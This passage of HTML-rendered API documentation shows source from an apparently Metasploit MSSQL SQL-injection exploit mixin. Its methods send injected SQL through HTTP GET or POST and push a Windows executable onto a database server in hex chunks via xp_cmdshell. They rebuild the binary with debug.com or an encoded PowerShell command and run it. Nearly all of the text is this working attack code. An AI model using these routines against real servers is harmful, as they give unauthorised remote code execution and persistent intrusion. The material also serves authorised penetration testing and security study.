<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_uri_encode'>uri_encode</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Failure.html#NoTarget-constant" title="Msf::Module::Failure::NoTarget (constant)">NoTarget</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>The SQL injection parameter was not specified in the POST data</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_post_data'>post_data</span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>DATA</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_gsub'>gsub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>[SQLi]</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_uri_encode'>uri_encode</span><span class='lparen'>(</span><span class='id identifier rubyid_sqla'>sqla</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span> <span class='op'>=</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>GET_PATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_send_request_cgi'>send_request_cgi</span><span class='lparen'>(</span><span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>uri</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_uri'><span class='object_link'><a href="../../../top-level-namespace.html#uri-instance_method" title="#uri (method)">uri</a></span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>method</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>POST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>data</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_post_data'>post_data</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>cookie</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>COOKIE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>headers</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Accept</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>*/*</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='rbrace'>}</span>
<span class='rbrace'>}</span><span class='comma'>,</span> <span class='int'>5</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_upload_exec-instance_method">
#<strong>mssql_upload_exec</strong>(exe, debug = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Upload and execute a Windows binary through MSSQL queries, using the debug.com loader read from the <code>HEX2BINARY</code> file. The uploaded executable is left behind in the SQL Server's <code>%TEMP%</code> directory.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_upload_exec'>mssql_upload_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_exe'>exe</span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_hex'>hex</span> <span class='op'>=</span> <span class='id identifier rubyid_exe'>exe</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_var_bypass'>var_bypass</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_var_payload'>var_payload</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Warning: This module will leave </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe in the SQL Server %TEMP% directory</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Writing the debug.com loader to the disk...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span> <span class='op'>=</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_read'>read</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='comma'>,</span> <span class='const'>File</span><span class='period'>.</span><span class='id identifier rubyid_size'>size</span><span class='lparen'>(</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>HEX2BINARY</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span><span class='period'>.</span><span class='id identifier rubyid_gsub!'>gsub!</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>KemneE3N</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_h2b'>h2b</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\n</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_line'>line</span><span class='op'>|</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_line'>line</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the debug script to an executable...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c cd %TEMP% &amp;&amp; cd %TEMP% &amp;&amp; debug &lt; %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c move %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.bin %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading the payload, please be patient...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_cnt'>cnt</span> <span class='op'>=</span> <span class='int'>500</span>
<span class='kw'>while</span><span class='lparen'>(</span><span class='id identifier rubyid_idx'>idx</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_hex'>hex</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex'>hex</span><span class='lbracket'>[</span><span class='id identifier rubyid_idx'>idx</span><span class='comma'>,</span><span class='id identifier rubyid_cnt'>cnt</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&gt;&gt;%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>+=</span> <span class='id identifier rubyid_cnt'>cnt</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the encoded payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_bypass'>var_bypass</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='symbol'>:timeout</span> <span class='op'>=&gt;</span> <span class='int'>10</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="mssql_xpcmdshell-instance_method">
#<strong>mssql_xpcmdshell</strong>(cmd, doprint = false, opts = {}) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Execute a system command via xp_cmdshell. The command is interpolated unescaped into a single-quoted <code>EXEC master..xp_cmdshell</code> statement, so a single quote in <code>cmd</code> breaks the query. When the server reports that xp_cmdshell is disabled the query is retried, but <code>force_enable</code> is set and never read, so the retry issues the identical query and loops for as long as that error persists.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 46</span>
<span class='kw'>def</span> <span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='id identifier rubyid_cmd'>cmd</span><span class='comma'>,</span><span class='id identifier rubyid_doprint'>doprint</span><span class='op'>=</span><span class='kw'>false</span><span class='comma'>,</span><span class='id identifier rubyid_opts'>opts</span><span class='op'>=</span><span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_force_enable'>force_enable</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_res'>res</span> <span class='op'>=</span> <span class='id identifier rubyid_mssql_query'>mssql_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>EXEC master..xp_cmdshell &#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cmd'>cmd</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_doprint'>doprint</span><span class='rparen'>)</span>
<span class='comment'>#mssql_print_reply(res) if doprint
</span>
<span class='kw'>return</span> <span class='id identifier rubyid_res'>res</span>
<span class='kw'>rescue</span> <span class='const'>RuntimeError</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>if</span><span class='lparen'>(</span><span class='id identifier rubyid_e'>e</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span> <span class='op'>=~</span> <span class='tstring'><span class='regexp_beg'>/</span><span class='tstring_content'>xp_cmdshell disabled</span><span class='regexp_end'>/</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_force_enable'>force_enable</span> <span class='op'>=</span> <span class='kw'>true</span>
<span class='kw'>retry</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_raise'>raise</span> <span class='id identifier rubyid_e'>e</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="powershell_upload_exec-instance_method">
#<strong>powershell_upload_exec</strong>(exe, debug = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Upload and execute a Windows binary through MSSQL queries and PowerShell (<code>-EncodedCommand</code>). The uploaded executable is left behind in the SQL Server's <code>%TEMP%</code> directory.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/mssql_sqli.rb', line 105</span>
<span class='kw'>def</span> <span class='id identifier rubyid_powershell_upload_exec'>powershell_upload_exec</span><span class='lparen'>(</span><span class='id identifier rubyid_exe'>exe</span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='comment'># hex converter
</span> <span class='id identifier rubyid_hex'>hex</span> <span class='op'>=</span> <span class='id identifier rubyid_exe'>exe</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span>
<span class='comment'># create random alpha 8 character names
</span> <span class='comment'>#var_bypass = rand_text_alpha(8)
</span> <span class='id identifier rubyid_var_payload'>var_payload</span> <span class='op'>=</span> <span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='int'>8</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Warning: This module will leave </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe in the SQL Server %TEMP% directory</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='comment'># our payload converter, grabs a hex file and converts it to binary for us through powershell
</span> <span class='id identifier rubyid_h2b'>h2b</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>$s = gc &#39;C:\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;;$s = [string]::Join(&#39;&#39;, $s);$s = $s.Replace(&#39;`r&#39;,&#39;&#39;); $s = $s.Replace(&#39;`n&#39;,&#39;&#39;);$b = new-object byte[] $($s.Length/2);0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(&#39;C:\\Windows\\Temp\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe&#39;,$b)</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_h2b_unicode'>h2b_unicode</span><span class='op'>=</span><span class='const'>Rex</span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_to_unicode'>to_unicode</span><span class='lparen'>(</span><span class='id identifier rubyid_h2b'>h2b</span><span class='rparen'>)</span>
<span class='comment'># base64 encode it, this allows us to perform execution through powershell without registry changes
</span> <span class='id identifier rubyid_h2b_encoded'>h2b_encoded</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_encode_base64'>encode_base64</span><span class='lparen'>(</span><span class='id identifier rubyid_h2b_unicode'>h2b_unicode</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Uploading the payload </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>, please be patient...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_cnt'>cnt</span> <span class='op'>=</span> <span class='int'>500</span>
<span class='kw'>while</span><span class='lparen'>(</span><span class='id identifier rubyid_idx'>idx</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_hex'>hex</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>-</span> <span class='int'>1</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c echo </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_hex'>hex</span><span class='lbracket'>[</span><span class='id identifier rubyid_idx'>idx</span><span class='comma'>,</span><span class='id identifier rubyid_cnt'>cnt</span><span class='rbracket'>]</span><span class='embexpr_end'>}</span><span class='tstring_content'>&gt;&gt;%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='rparen'>)</span>
<span class='id identifier rubyid_idx'>idx</span> <span class='op'>+=</span> <span class='id identifier rubyid_cnt'>cnt</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Converting the payload utilizing PowerShell EncodedCommand...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>powershell -EncodedCommand </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_h2b_encoded'>h2b_encoded</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>cmd.exe /c del %TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_debug'>debug</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Executing the payload...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_mssql_xpcmdshell'>mssql_xpcmdshell</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>%TEMP%\\</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe</span><span class='tstring_end'>&quot;</span></span><span class='comma'>,</span> <span class='kw'>false</span><span class='comma'>,</span> <span class='lbrace'>{</span><span class='symbol'>:timeout</span> <span class='op'>=&gt;</span> <span class='int'>1</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Be sure to cleanup </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_var_payload'>var_payload</span><span class='embexpr_end'>}</span><span class='tstring_content'>.exe...</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</body>
</html>